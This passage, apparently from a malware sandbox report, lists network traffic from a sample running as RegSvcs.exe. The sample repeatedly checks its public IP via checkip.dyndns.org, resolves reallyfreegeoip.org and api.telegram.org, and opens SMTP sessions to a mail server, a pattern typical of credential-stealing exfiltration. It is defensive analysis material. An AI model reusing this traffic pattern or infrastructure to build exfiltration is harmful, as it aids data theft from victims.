Dec 18, 2024 13:45:50.171914101 CET	49873	587	192.168.2.5	3.130.71.34
Dec 18, 2024 13:45:50.339183092 CET	587	49873	3.130.71.34	192.168.2.5
Dec 18, 2024 13:45:50.339292049 CET	49873	587	192.168.2.5	3.130.71.34
Dec 18, 2024 13:45:55.128045082 CET	587	49828	3.130.71.34	192.168.2.5
Dec 18, 2024 13:45:55.128451109 CET	49828	587	192.168.2.5	3.130.71.34
Dec 18, 2024 13:45:55.129837036 CET	49828	587	192.168.2.5	3.130.71.34
Dec 18, 2024 13:45:55.249464989 CET	587	49828	3.130.71.34	192.168.2.5
Dec 18, 2024 13:46:12.353543997 CET	587	49873	3.130.71.34	192.168.2.5
Dec 18, 2024 13:46:12.353624105 CET	49873	587	192.168.2.5	3.130.71.34
Dec 18, 2024 13:46:12.353857994 CET	49873	587	192.168.2.5	3.130.71.34
Dec 18, 2024 13:46:12.474103928 CET	587	49873	3.130.71.34	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 13:44:44.948971987 CET	64508	53	192.168.2.5	1.1.1.1
Dec 18, 2024 13:44:45.086726904 CET	53	64508	1.1.1.1	192.168.2.5
Dec 18, 2024 13:44:47.037870884 CET	53759	53	192.168.2.5	1.1.1.1
Dec 18, 2024 13:44:47.178442001 CET	53	53759	1.1.1.1	192.168.2.5
Dec 18, 2024 13:45:25.298752069 CET	61388	53	192.168.2.5	1.1.1.1
Dec 18, 2024 13:45:25.436108112 CET	53	61388	1.1.1.1	192.168.2.5
Dec 18, 2024 13:45:32.678481102 CET	64534	53	192.168.2.5	1.1.1.1
Dec 18, 2024 13:45:33.091238022 CET	53	64534	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 13:44:44.948971987 CET	192.168.2.5	1.1.1.1	0xea9a	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:44:47.037870884 CET	192.168.2.5	1.1.1.1	0xb5e2	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:45:25.298752069 CET	192.168.2.5	1.1.1.1	0x3c62	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:45:32.678481102 CET	192.168.2.5	1.1.1.1	0x4055	Standard query (0)	mail.acadental.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 13:44:45.086726904 CET	1.1.1.1	192.168.2.5	0xea9a	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 13:44:45.086726904 CET	1.1.1.1	192.168.2.5	0xea9a	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:44:45.086726904 CET	1.1.1.1	192.168.2.5	0xea9a	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:44:45.086726904 CET	1.1.1.1	192.168.2.5	0xea9a	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:44:45.086726904 CET	1.1.1.1	192.168.2.5	0xea9a	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:44:45.086726904 CET	1.1.1.1	192.168.2.5	0xea9a	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:44:47.178442001 CET	1.1.1.1	192.168.2.5	0xb5e2	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:44:47.178442001 CET	1.1.1.1	192.168.2.5	0xb5e2	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:45:25.436108112 CET	1.1.1.1	192.168.2.5	0x3c62	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:45:33.091238022 CET	1.1.1.1	192.168.2.5	0x4055	No error (0)	mail.acadental.com		3.130.71.34	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	132.226.247.73	80	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:45.213882923 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 13:44:46.526554108 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:44:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5a823463941f1f15e5c35e6c6426e3ef Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 18, 2024 13:44:46.535198927 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 18, 2024 13:44:46.971438885 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:44:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 300ecb08568feb87db7dfd99ddb9de2c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 18, 2024 13:44:48.949779034 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 18, 2024 13:44:49.375914097 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:44:49 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4e0a2e3b6aa08d5effc83da623298d0e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	132.226.247.73	80	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:51.165811062 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 18, 2024 13:44:52.481070042 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:44:52 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3ebb8caae4024630ed4473342a4c89be Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49715	132.226.247.73	80	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:54.323556900 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 13:44:55.676704884 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:44:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f1bd65de53ae080d9a148930f02eb8ea Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49723	132.226.247.73	80	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:57.482086897 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 13:44:58.787100077 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:44:58 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fed06e764d84be0851a8bc116f463a59 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49737	132.226.247.73	80	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:00.584429979 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 13:45:09.003864050 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:08 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2469dc4e5fe45526c3d55ccd12593b8e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49738	132.226.247.73	80	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:01.157088041 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 13:45:11.008951902 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a7be7eb72772b5fc9dff7e958551b934 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 18, 2024 13:45:11.012480021 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 18, 2024 13:45:14.444562912 CET	745	IN	HTTP/1.1 504 Gateway Time-out Date: Wed, 18 Dec 2024 12:45:14 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive X-Request-ID: fc75349a6be7bd356a55ebb1b93e1194 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 18, 2024 13:45:14.457931995 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 18, 2024 13:45:17.155584097 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 390af0cb3ac22e8d1c9b8678f90736f3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 18, 2024 13:45:18.869766951 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 18, 2024 13:45:19.295334101 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: dd80b7c102adc3c5e81e189f5cef9ccf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49760	132.226.247.73	80	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:10.794975042 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 13:45:16.403681993 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8427e812eaaccd5af5472bf519bfb700 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49782	132.226.247.73	80	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:18.201514006 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 13:45:20.507671118 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c8488958e8b51609da4a55a2fa07cbb2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49790	132.226.247.73	80	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:21.081108093 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 18, 2024 13:45:22.386730909 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:22 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 825283545f2df31f4677af8428c5cb5f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49792	132.226.247.73	80	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:22.294537067 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 13:45:23.598457098 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2f83a290f70e9baa1cd5483a07382b73 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49800	132.226.247.73	80	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:24.179924965 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 18, 2024 13:45:26.487622023 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c7a2aeb3661c6d0d55fde17c977eb4f6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49812	132.226.247.73	80	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:28.275527954 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 18, 2024 13:45:29.578427076 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0bbb049ed58db817be09825b0899e6b8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49824	132.226.247.73	80	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:31.366010904 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 18, 2024 13:45:32.670057058 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c957dd3bc09230f6fe50f7f5a2cd2377 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49832	132.226.247.73	80	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:34.546960115 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
